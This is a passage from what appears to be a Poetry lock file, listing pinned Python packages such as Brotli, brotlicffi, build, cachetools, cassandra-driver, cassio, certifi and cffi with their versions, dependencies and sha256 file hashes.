{file = "Brotli-1.1.0-cp36-cp36m-manylinux_2_5_x86_64.manylinux1_x86_64.whl", hash = "sha256:fdc3ff3bfccdc6b9cc7c342c03aa2400683f0cb891d46e94b64a197910dc4064"},
{file = "Brotli-1.1.0-cp36-cp36m-musllinux_1_1_aarch64.whl", hash = "sha256:5eeb539606f18a0b232d4ba45adccde4125592f3f636a6182b4a8a436548b914"},
{file = "Brotli-1.1.0-cp36-cp36m-musllinux_1_1_i686.whl", hash = "sha256:fd5f17ff8f14003595ab414e45fce13d073e0762394f957182e69035c9f3d7c2"},
{file = "Brotli-1.1.0-cp36-cp36m-musllinux_1_1_ppc64le.whl", hash = "sha256:069a121ac97412d1fe506da790b3e69f52254b9df4eb665cd42460c837193354"},
{file = "Brotli-1.1.0-cp36-cp36m-musllinux_1_1_x86_64.whl", hash = "sha256:e93dfc1a1165e385cc8239fab7c036fb2cd8093728cbd85097b284d7b99249a2"},
{file = "Brotli-1.1.0-cp36-cp36m-win32.whl", hash = "sha256:a599669fd7c47233438a56936988a2478685e74854088ef5293802123b5b2460"},
{file = "Brotli-1.1.0-cp36-cp36m-win_amd64.whl", hash = "sha256:d143fd47fad1db3d7c27a1b1d66162e855b5d50a89666af46e1679c496e8e579"},
{file = "Brotli-1.1.0-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:11d00ed0a83fa22d29bc6b64ef636c4552ebafcef57154b4ddd132f5638fbd1c"},
{file = "Brotli-1.1.0-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:f733d788519c7e3e71f0855c96618720f5d3d60c3cb829d8bbb722dddce37985"},
{file = "Brotli-1.1.0-cp37-cp37m-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:929811df5462e182b13920da56c6e0284af407d1de637d8e536c5cd00a7daf60"},
{file = "Brotli-1.1.0-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:0b63b949ff929fbc2d6d3ce0e924c9b93c9785d877a21a1b678877ffbbc4423a"},
{file = "Brotli-1.1.0-cp37-cp37m-manylinux_2_5_x86_64.manylinux1_x86_64.whl", hash = "sha256:d192f0f30804e55db0d0e0a35d83a9fead0e9a359a9ed0285dbacea60cc10a84"},
{file = "Brotli-1.1.0-cp37-cp37m-musllinux_1_1_aarch64.whl", hash = "sha256:f296c40e23065d0d6650c4aefe7470d2a25fffda489bcc3eb66083f3ac9f6643"},
{file = "Brotli-1.1.0-cp37-cp37m-musllinux_1_1_i686.whl", hash = "sha256:919e32f147ae93a09fe064d77d5ebf4e35502a8df75c29fb05788528e330fe74"},
{file = "Brotli-1.1.0-cp37-cp37m-musllinux_1_1_ppc64le.whl", hash = "sha256:23032ae55523cc7bccb4f6a0bf368cd25ad9bcdcc1990b64a647e7bbcce9cb5b"},
{file = "Brotli-1.1.0-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:224e57f6eac61cc449f498cc5f0e1725ba2071a3d4f48d5d9dffba42db196438"},
{file = "Brotli-1.1.0-cp37-cp37m-win32.whl", hash = "sha256:587ca6d3cef6e4e868102672d3bd9dc9698c309ba56d41c2b9c85bbb903cdb95"},
{file = "Brotli-1.1.0-cp37-cp37m-win_amd64.whl", hash = "sha256:2954c1c23f81c2eaf0b0717d9380bd348578a94161a65b3a2afc62c86467dd68"},
{file = "Brotli-1.1.0-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:efa8b278894b14d6da122a72fefcebc28445f2d3f880ac59d46c90f4c13be9a3"},
{file = "Brotli-1.1.0-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:03d20af184290887bdea3f0f78c4f737d126c74dc2f3ccadf07e54ceca3bf208"},
{file = "Brotli-1.1.0-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:6172447e1b368dcbc458925e5ddaf9113477b0ed542df258d84fa28fc45ceea7"},
{file = "Brotli-1.1.0-cp38-cp38-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:a743e5a28af5f70f9c080380a5f908d4d21d40e8f0e0c8901604d15cfa9ba751"},
{file = "Brotli-1.1.0-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:0541e747cce78e24ea12d69176f6a7ddb690e62c425e01d31cc065e69ce55b48"},
{file = "Brotli-1.1.0-cp38-cp38-manylinux_2_5_x86_64.manylinux1_x86_64.whl", hash = "sha256:cdbc1fc1bc0bff1cef838eafe581b55bfbffaed4ed0318b724d0b71d4d377619"},
{file = "Brotli-1.1.0-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:890b5a14ce214389b2cc36ce82f3093f96f4cc730c1cffdbefff77a7c71f2a97"},
{file = "Brotli-1.1.0-cp38-cp38-musllinux_1_1_i686.whl", hash = "sha256:1ab4fbee0b2d9098c74f3057b2bc055a8bd92ccf02f65944a241b4349229185a"},
{file = "Brotli-1.1.0-cp38-cp38-musllinux_1_1_ppc64le.whl", hash = "sha256:141bd4d93984070e097521ed07e2575b46f817d08f9fa42b16b9b5f27b5ac088"},
{file = "Brotli-1.1.0-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:fce1473f3ccc4187f75b4690cfc922628aed4d3dd013d047f95a9b3919a86596"},
{file = "Brotli-1.1.0-cp38-cp38-win32.whl", hash = "sha256:db85ecf4e609a48f4b29055f1e144231b90edc90af7481aa731ba2d059226b1b"},
{file = "Brotli-1.1.0-cp38-cp38-win_amd64.whl", hash = "sha256:3d7954194c36e304e1523f55d7042c59dc53ec20dd4e9ea9d151f1b62b4415c0"},
{file = "Brotli-1.1.0-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:5fb2ce4b8045c78ebbc7b8f3c15062e435d47e7393cc57c25115cfd49883747a"},
{file = "Brotli-1.1.0-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:7905193081db9bfa73b1219140b3d315831cbff0d8941f22da695832f0dd188f"},
{file = "Brotli-1.1.0-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:a77def80806c421b4b0af06f45d65a136e7ac0bdca3c09d9e2ea4e515367c7e9"},
{file = "Brotli-1.1.0-cp39-cp39-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:8dadd1314583ec0bf2d1379f7008ad627cd6336625d6679cf2f8e67081b83acf"},
{file = "Brotli-1.1.0-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:901032ff242d479a0efa956d853d16875d42157f98951c0230f69e69f9c09bac"},
{file = "Brotli-1.1.0-cp39-cp39-manylinux_2_5_x86_64.manylinux1_x86_64.whl", hash = "sha256:22fc2a8549ffe699bfba2256ab2ed0421a7b8fadff114a3d201794e45a9ff578"},
{file = "Brotli-1.1.0-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:ae15b066e5ad21366600ebec29a7ccbc86812ed267e4b28e860b8ca16a2bc474"},
{file = "Brotli-1.1.0-cp39-cp39-musllinux_1_1_i686.whl", hash = "sha256:949f3b7c29912693cee0afcf09acd6ebc04c57af949d9bf77d6101ebb61e388c"},
{file = "Brotli-1.1.0-cp39-cp39-musllinux_1_1_ppc64le.whl", hash = "sha256:89f4988c7203739d48c6f806f1e87a1d96e0806d44f0fba61dba81392c9e474d"},
{file = "Brotli-1.1.0-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:de6551e370ef19f8de1807d0a9aa2cdfdce2e85ce88b122fe9f6b2b076837e59"},
{file = "Brotli-1.1.0-cp39-cp39-win32.whl", hash = "sha256:f0d8a7a6b5983c2496e364b969f0e526647a06b075d034f3297dc66f3b360c64"},
{file = "Brotli-1.1.0-cp39-cp39-win_amd64.whl", hash = "sha256:cdad5b9014d83ca68c25d2e9444e28e967ef16e80f6b436918c700c117a85467"},
{file = "Brotli-1.1.0.tar.gz", hash = "sha256:81de08ac11bcb85841e440c13611c00b67d3bf82698314928d0b676362546724"},
]
[[package]]
name = "brotlicffi"
version = "1.1.0.0"
description = "Python CFFI bindings to the Brotli library"
optional = true
python-versions = ">=3.7"
files = [
{file = "brotlicffi-1.1.0.0-cp37-abi3-macosx_10_9_x86_64.whl", hash = "sha256:9b7ae6bd1a3f0df532b6d67ff674099a96d22bc0948955cb338488c31bfb8851"},
{file = "brotlicffi-1.1.0.0-cp37-abi3-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:19ffc919fa4fc6ace69286e0a23b3789b4219058313cf9b45625016bf7ff996b"},
{file = "brotlicffi-1.1.0.0-cp37-abi3-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:9feb210d932ffe7798ee62e6145d3a757eb6233aa9a4e7db78dd3690d7755814"},
{file = "brotlicffi-1.1.0.0-cp37-abi3-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:84763dbdef5dd5c24b75597a77e1b30c66604725707565188ba54bab4f114820"},
{file = "brotlicffi-1.1.0.0-cp37-abi3-win32.whl", hash = "sha256:1b12b50e07c3911e1efa3a8971543e7648100713d4e0971b13631cce22c587eb"},
{file = "brotlicffi-1.1.0.0-cp37-abi3-win_amd64.whl", hash = "sha256:994a4f0681bb6c6c3b0925530a1926b7a189d878e6e5e38fae8efa47c5d9c613"},
{file = "brotlicffi-1.1.0.0-pp310-pypy310_pp73-macosx_10_9_x86_64.whl", hash = "sha256:2e4aeb0bd2540cb91b069dbdd54d458da8c4334ceaf2d25df2f4af576d6766ca"},
{file = "brotlicffi-1.1.0.0-pp310-pypy310_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:4b7b0033b0d37bb33009fb2fef73310e432e76f688af76c156b3594389d81391"},
{file = "brotlicffi-1.1.0.0-pp310-pypy310_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:54a07bb2374a1eba8ebb52b6fafffa2afd3c4df85ddd38fcc0511f2bb387c2a8"},
{file = "brotlicffi-1.1.0.0-pp310-pypy310_pp73-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:7901a7dc4b88f1c1475de59ae9be59799db1007b7d059817948d8e4f12e24e35"},
{file = "brotlicffi-1.1.0.0-pp310-pypy310_pp73-win_amd64.whl", hash = "sha256:ce01c7316aebc7fce59da734286148b1d1b9455f89cf2c8a4dfce7d41db55c2d"},
{file = "brotlicffi-1.1.0.0-pp37-pypy37_pp73-macosx_10_9_x86_64.whl", hash = "sha256:246f1d1a90279bb6069de3de8d75a8856e073b8ff0b09dcca18ccc14cec85979"},
{file = "brotlicffi-1.1.0.0-pp37-pypy37_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:cc4bc5d82bc56ebd8b514fb8350cfac4627d6b0743382e46d033976a5f80fab6"},
{file = "brotlicffi-1.1.0.0-pp37-pypy37_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:37c26ecb14386a44b118ce36e546ce307f4810bc9598a6e6cb4f7fca725ae7e6"},
{file = "brotlicffi-1.1.0.0-pp37-pypy37_pp73-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:ca72968ae4eaf6470498d5c2887073f7efe3b1e7d7ec8be11a06a79cc810e990"},
{file = "brotlicffi-1.1.0.0-pp37-pypy37_pp73-win_amd64.whl", hash = "sha256:add0de5b9ad9e9aa293c3aa4e9deb2b61e99ad6c1634e01d01d98c03e6a354cc"},
{file = "brotlicffi-1.1.0.0-pp38-pypy38_pp73-macosx_10_9_x86_64.whl", hash = "sha256:9b6068e0f3769992d6b622a1cd2e7835eae3cf8d9da123d7f51ca9c1e9c333e5"},
{file = "brotlicffi-1.1.0.0-pp38-pypy38_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:8557a8559509b61e65083f8782329188a250102372576093c88930c875a69838"},
{file = "brotlicffi-1.1.0.0-pp38-pypy38_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:2a7ae37e5d79c5bdfb5b4b99f2715a6035e6c5bf538c3746abc8e26694f92f33"},
{file = "brotlicffi-1.1.0.0-pp38-pypy38_pp73-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:391151ec86bb1c683835980f4816272a87eaddc46bb91cbf44f62228b84d8cca"},
{file = "brotlicffi-1.1.0.0-pp38-pypy38_pp73-win_amd64.whl", hash = "sha256:2f3711be9290f0453de8eed5275d93d286abe26b08ab4a35d7452caa1fef532f"},
{file = "brotlicffi-1.1.0.0-pp39-pypy39_pp73-macosx_10_9_x86_64.whl", hash = "sha256:1a807d760763e398bbf2c6394ae9da5815901aa93ee0a37bca5efe78d4ee3171"},
{file = "brotlicffi-1.1.0.0-pp39-pypy39_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:fa8ca0623b26c94fccc3a1fdd895be1743b838f3917300506d04aa3346fd2a14"},
{file = "brotlicffi-1.1.0.0-pp39-pypy39_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:3de0cf28a53a3238b252aca9fed1593e9d36c1d116748013339f0949bfc84112"},
{file = "brotlicffi-1.1.0.0-pp39-pypy39_pp73-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:6be5ec0e88a4925c91f3dea2bb0013b3a2accda6f77238f76a34a1ea532a1cb0"},
{file = "brotlicffi-1.1.0.0-pp39-pypy39_pp73-win_amd64.whl", hash = "sha256:d9eb71bb1085d996244439154387266fd23d6ad37161f6f52f1cd41dd95a3808"},
{file = "brotlicffi-1.1.0.0.tar.gz", hash = "sha256:b77827a689905143f87915310b93b273ab17888fd43ef350d4832c4a71083c13"},
]
[package.dependencies]
cffi = ">=1.0.0"
[[package]]
name = "build"
version = "1.0.3"
description = "A simple, correct Python build frontend"
optional = true
python-versions = ">= 3.7"
files = [
{file = "build-1.0.3-py3-none-any.whl", hash = "sha256:589bf99a67df7c9cf07ec0ac0e5e2ea5d4b37ac63301c4986d1acb126aa83f8f"},
{file = "build-1.0.3.tar.gz", hash = "sha256:538aab1b64f9828977f84bc63ae570b060a8ed1be419e7870b8b4fc5e6ea553b"},
]
[package.dependencies]
colorama = {version = "*", markers = "os_name == \"nt\""}
importlib-metadata = {version = ">=4.6", markers = "python_version < \"3.10\""}
packaging = ">=19.0"
pyproject_hooks = "*"
tomli = {version = ">=1.1.0", markers = "python_version < \"3.11\""}
[package.extras]
docs = ["furo (>=2023.08.17)", "sphinx (>=7.0,<8.0)", "sphinx-argparse-cli (>=1.5)", "sphinx-autodoc-typehints (>=1.10)", "sphinx-issues (>=3.0.0)"]
test = ["filelock (>=3)", "pytest (>=6.2.4)", "pytest-cov (>=2.12)", "pytest-mock (>=2)", "pytest-rerunfailures (>=9.1)", "pytest-xdist (>=1.34)", "setuptools (>=42.0.0)", "setuptools (>=56.0.0)", "setuptools (>=56.0.0)", "setuptools (>=67.8.0)", "wheel (>=0.36.0)"]
typing = ["importlib-metadata (>=5.1)", "mypy (>=1.5.0,<1.6.0)", "tomli", "typing-extensions (>=3.7.4.3)"]
virtualenv = ["virtualenv (>=20.0.35)"]
[[package]]
name = "cachetools"
version = "5.3.2"
description = "Extensible memoizing collections and decorators"
optional = true
python-versions = ">=3.7"
files = [
{file = "cachetools-5.3.2-py3-none-any.whl", hash = "sha256:861f35a13a451f94e301ce2bec7cac63e881232ccce7ed67fab9b5df4d3beaa1"},
{file = "cachetools-5.3.2.tar.gz", hash = "sha256:086ee420196f7b2ab9ca2db2520aca326318b68fe5ba8bc4d49cca91add450f2"},
]
[[package]]
name = "cassandra-driver"
version = "3.28.0"
description = "DataStax Driver for Apache Cassandra"
optional = false
python-versions = "*"
files = [
{file = "cassandra-driver-3.28.0.tar.gz", hash = "sha256:64ff130d19f994b80997c14343a8306be52a0e7ab92520a534eed944c88d70df"},
{file = "cassandra_driver-3.28.0-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:a8cceb2cc658b3ebf28873f84aab4f28bbd5df23a6528a5b38ecf89a45232509"},
{file = "cassandra_driver-3.28.0-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:35aef74e2a593a969b77a3fcf02d27e9b82a078d9aa66caa3bd2d2583c46a82c"},
{file = "cassandra_driver-3.28.0-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:48f20e0d21b6c7406dfd8a4d9e07fddc3c7c3d6ad7d5b5d480bf82aac7068739"},
{file = "cassandra_driver-3.28.0-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:3820a421fb7e4cf215718dc35522869c5f933d4fd4c50fd43307d3ce5d9dd138"},
{file = "cassandra_driver-3.28.0-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:0dd9511fe5b85010e92199f6589e0733ab14ed3d2279dcc6ae504c0cef11d652"},
{file = "cassandra_driver-3.28.0-cp310-cp310-win32.whl", hash = "sha256:887f7e3df9b34b41de6dfdd5f2ef8804c2d9782bbc39202eda9d3b67a3c8fe37"},
{file = "cassandra_driver-3.28.0-cp310-cp310-win_amd64.whl", hash = "sha256:28c636239b15944103df18a12ef95e6401ceadd7b9aca2d59f4beccf9ca21e2d"},
{file = "cassandra_driver-3.28.0-cp311-cp311-macosx_10_9_universal2.whl", hash = "sha256:9232434459303b0e1a26fa65006fd8438475037aef4e6204a32dfaeb10e7f739"},
{file = "cassandra_driver-3.28.0-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:634a553a5309a9faa08c3256fe0237ff0308152210211f3b8eab0664335560e0"},
{file = "cassandra_driver-3.28.0-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:4a101114a7d93505ee79272edc82dba0cfc706172ad7948a6e4fb3dc1eb8b59c"},
{file = "cassandra_driver-3.28.0-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:36d844ba0089111858fad3c53897b0fea7c91cedd8bd205eeb82fe22fd60e748"},
{file = "cassandra_driver-3.28.0-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:c3bf6bacb60dc8d1b8ba5ddd7d35772e3b98da951aed6bb148827aa9c38cd009"},
{file = "cassandra_driver-3.28.0-cp311-cp311-win32.whl", hash = "sha256:212eb39ca99ab5960eb5c31ce279b61e075df02ac7a6209415982a3f8cfe1126"},
{file = "cassandra_driver-3.28.0-cp311-cp311-win_amd64.whl", hash = "sha256:777f60ed821ec43d5b3f7a65eaf02decbd9cbc11e32f2099bfe9d7a6bfe33da9"},
{file = "cassandra_driver-3.28.0-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:b867c49c3c9efa21923845456cfb3e81ad13a33e40eb20279f58b3642d54614f"},
{file = "cassandra_driver-3.28.0-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:f1dc54edf3b664dc8e45a9c8fed163dacbad8bc92c788c84a371ccb700e18638"},
{file = "cassandra_driver-3.28.0-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:e383aff200b7194d0d5625bf162bbc8471d05db7163c546341e5f27b36b53134"},
{file = "cassandra_driver-3.28.0-cp37-cp37m-win32.whl", hash = "sha256:a5e8b066f816868b344c108f34acc04b53c44caed2cdbcfe08ebdcbc1fd35046"},
{file = "cassandra_driver-3.28.0-cp37-cp37m-win_amd64.whl", hash = "sha256:ae8c8e9a46e1b0174ace1e836d4ea97292aa6de509db0def0f816322468fb430"},
{file = "cassandra_driver-3.28.0-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:d5e8cf7db955b113f51274f166be9db0f0a06620c894abc41159828f0aeda259"},
{file = "cassandra_driver-3.28.0-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:26cbdb0d04f749b78bf7de17fd6a713b90430d1c70d8aa442845d51db823b9eb"},
{file = "cassandra_driver-3.28.0-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:fe302940780932d83414ad5282c8a6bd72b248f3b1fceff995f28c77a6ebc925"},
{file = "cassandra_driver-3.28.0-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:3694c1e19d310668f5a60c16511fb12c3ad4c387d089a8080b74239a916620fb"},
{file = "cassandra_driver-3.28.0-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:9f5690b7b121e82c4365d298bd49dc574ecd8eed3ec0bafdf43fce708f2f992b"},
{file = "cassandra_driver-3.28.0-cp38-cp38-win32.whl", hash = "sha256:d09c8b0b392064054656050448dece04e4fa890af3c677a2f2034af14983ceb5"},
{file = "cassandra_driver-3.28.0-cp38-cp38-win_amd64.whl", hash = "sha256:e2342420bae4f80587e2ddebb38ade448c9ab1d210787a8030c1c04f54ef4a84"},
{file = "cassandra_driver-3.28.0-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:c8d934cb7eac6586823a7eb69d40019154fd8e7d640bfaed49ac7edc373578df"},
{file = "cassandra_driver-3.28.0-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:8b51805d57ff6ed73a95c83c25d0479391da28c765c2bf019ee1370d8ca64cd0"},
{file = "cassandra_driver-3.28.0-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:5f05495ccabe5be046bb9f1c2cc3e3ff696a94fd4f2f2b1004c951e56b1ea38d"},
{file = "cassandra_driver-3.28.0-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:59050666423c4ffdda9626676c18cce83a71c8331dd3d99f6b9306e0941348cf"},
{file = "cassandra_driver-3.28.0-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:a665841c15f2fade6b00a8404d3424fed8757971b75e791b69bfedacc4753f7c"},
{file = "cassandra_driver-3.28.0-cp39-cp39-win32.whl", hash = "sha256:46433de332b8ef59ad44140f287b584303b90111cf6f355ec8c990830135dd21"},
{file = "cassandra_driver-3.28.0-cp39-cp39-win_amd64.whl", hash = "sha256:5e6213f10d58b05a6120bcff4f479d89c152d3f4ba43b3bda3283ee67c3abe23"},
]
[package.dependencies]
geomet = ">=0.1,<0.3"
six = ">=1.9"
[package.extras]
cle = ["cryptography (>=35.0)"]
graph = ["gremlinpython (==3.4.6)"]
[[package]]
name = "cassio"
version = "0.1.3"
description = "A framework-agnostic Python library to seamlessly integrate Apache Cassandra(R) with ML/LLM/genAI workloads."
optional = false
python-versions = ">=3.8"
files = [
{file = "cassio-0.1.3-py3-none-any.whl", hash = "sha256:2ced5b7e5c6e58b7b4647388d8629c77fdb9a8d745f8763e7e87d1da924ff0f1"},
{file = "cassio-0.1.3.tar.gz", hash = "sha256:dbea30c1aa3014205fd48e036d2bcc8ba949e8b3f3351ca9cef698665cb40a18"},
]
[package.dependencies]
cassandra-driver = ">=3.28.0"
numpy = ">=1.0"
requests = ">=2"
[[package]]
name = "certifi"
version = "2023.7.22"
description = "Python package for providing Mozilla's CA Bundle."
optional = false
python-versions = ">=3.6"
files = [
{file = "certifi-2023.7.22-py3-none-any.whl", hash = "sha256:92d6037539857d8206b8f6ae472e8b77db8058fec5937a1ef3f54304089edbb9"},
{file = "certifi-2023.7.22.tar.gz", hash = "sha256:539cc1d13202e33ca466e88b2807e29f4c13049d6d87031a3c110744495cb082"},
]
[[package]]
name = "cffi"
version = "1.16.0"
description = "Foreign Function Interface for Python calling C code."
optional = false
python-versions = ">=3.8"
files = [
{file = "cffi-1.16.0-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:6b3d6606d369fc1da4fd8c357d026317fbb9c9b75d36dc16e90e84c26854b088"},
{file = "cffi-1.16.0-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:ac0f5edd2360eea2f1daa9e26a41db02dd4b0451b48f7c318e217ee092a213e9"},
{file = "cffi-1.16.0-cp310-cp310-manylinux_2_12_i686.manylinux2010_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:7e61e3e4fa664a8588aa25c883eab612a188c725755afff6289454d6362b9673"},
{file = "cffi-1.16.0-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:a72e8961a86d19bdb45851d8f1f08b041ea37d2bd8d4fd19903bc3083d80c896"},
{file = "cffi-1.16.0-cp310-cp310-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:5b50bf3f55561dac5438f8e70bfcdfd74543fd60df5fa5f62d94e5867deca684"},
{file = "cffi-1.16.0-cp310-cp310-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:7651c50c8c5ef7bdb41108b7b8c5a83013bfaa8a935590c5d74627c047a583c7"},
{file = "cffi-1.16.0-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:e4108df7fe9b707191e55f33efbcb2d81928e10cea45527879a4749cbe472614"},
{file = "cffi-1.16.0-cp310-cp310-musllinux_1_1_i686.whl", hash = "sha256:32c68ef735dbe5857c810328cb2481e24722a59a2003018885514d4c09af9743"},
{file = "cffi-1.16.0-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:673739cb539f8cdaa07d92d02efa93c9ccf87e345b9a0b556e3ecc666718468d"},
{file = "cffi-1.16.0-cp310-cp310-win32.whl", hash = "sha256:9f90389693731ff1f659e55c7d1640e2ec43ff725cc61b04b2f9c6d8d017df6a"},
{file = "cffi-1.16.0-cp310-cp310-win_amd64.whl", hash = "sha256:e6024675e67af929088fda399b2094574609396b1decb609c55fa58b028a32a1"},
{file = "cffi-1.16.0-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:b84834d0cf97e7d27dd5b7f3aca7b6e9263c56308ab9dc8aae9784abb774d404"},
{file = "cffi-1.16.0-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:1b8ebc27c014c59692bb2664c7d13ce7a6e9a629be20e54e7271fa696ff2b417"},
{file = "cffi-1.16.0-cp311-cp311-manylinux_2_12_i686.manylinux2010_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:ee07e47c12890ef248766a6e55bd38ebfb2bb8edd4142d56db91b21ea68b7627"},
{file = "cffi-1.16.0-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:d8a9d3ebe49f084ad71f9269834ceccbf398253c9fac910c4fd7053ff1386936"},
{file = "cffi-1.16.0-cp311-cp311-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:e70f54f1796669ef691ca07d046cd81a29cb4deb1e5f942003f401c0c4a2695d"},
{file = "cffi-1.16.0-cp311-cp311-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:5bf44d66cdf9e893637896c7faa22298baebcd18d1ddb6d2626a6e39793a1d56"},
{file = "cffi-1.16.0-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:7b78010e7b97fef4bee1e896df8a4bbb6712b7f05b7ef630f9d1da00f6444d2e"},
{file = "cffi-1.16.0-cp311-cp311-musllinux_1_1_i686.whl", hash = "sha256:c6a164aa47843fb1b01e941d385aab7215563bb8816d80ff3a363a9f8448a8dc"},
{file = "cffi-1.16.0-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:e09f3ff613345df5e8c3667da1d918f9149bd623cd9070c983c013792a9a62eb"},
{file = "cffi-1.16.0-cp311-cp311-win32.whl", hash = "sha256:2c56b361916f390cd758a57f2e16233eb4f64bcbeee88a4881ea90fca14dc6ab"},
{file = "cffi-1.16.0-cp311-cp311-win_amd64.whl", hash = "sha256:db8e577c19c0fda0beb7e0d4e09e0ba74b1e4c092e0e40bfa12fe05b6f6d75ba"},
{file = "cffi-1.16.0-cp312-cp312-macosx_10_9_x86_64.whl", hash = "sha256:fa3a0128b152627161ce47201262d3140edb5a5c3da88d73a1b790a959126956"},
{file = "cffi-1.16.0-cp312-cp312-macosx_11_0_arm64.whl", hash = "sha256:68e7c44931cc171c54ccb702482e9fc723192e88d25a0e133edd7aff8fcd1f6e"},
{file = "cffi-1.16.0-cp312-cp312-manylinux_2_12_i686.manylinux2010_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:abd808f9c129ba2beda4cfc53bde801e5bcf9d6e0f22f095e45327c038bfe68e"},
{file = "cffi-1.16.0-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:88e2b3c14bdb32e440be531ade29d3c50a1a59cd4e51b1dd8b0865c54ea5d2e2"},
{file = "cffi-1.16.0-cp312-cp312-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:fcc8eb6d5902bb1cf6dc4f187ee3ea80a1eba0a89aba40a5cb20a5087d961357"},
{file = "cffi-1.16.0-cp312-cp312-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:b7be2d771cdba2942e13215c4e340bfd76398e9227ad10402a8767ab1865d2e6"},
{file = "cffi-1.16.0-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:e715596e683d2ce000574bae5d07bd522c781a822866c20495e52520564f0969"},
{file = "cffi-1.16.0-cp312-cp312-musllinux_1_1_x86_64.whl", hash = "sha256:2d92b25dbf6cae33f65005baf472d2c245c050b1ce709cc4588cdcdd5495b520"},
{file = "cffi-1.16.0-cp312-cp312-win32.whl", hash = "sha256:b2ca4e77f9f47c55c194982e10f058db063937845bb2b7a86c84a6cfe0aefa8b"},
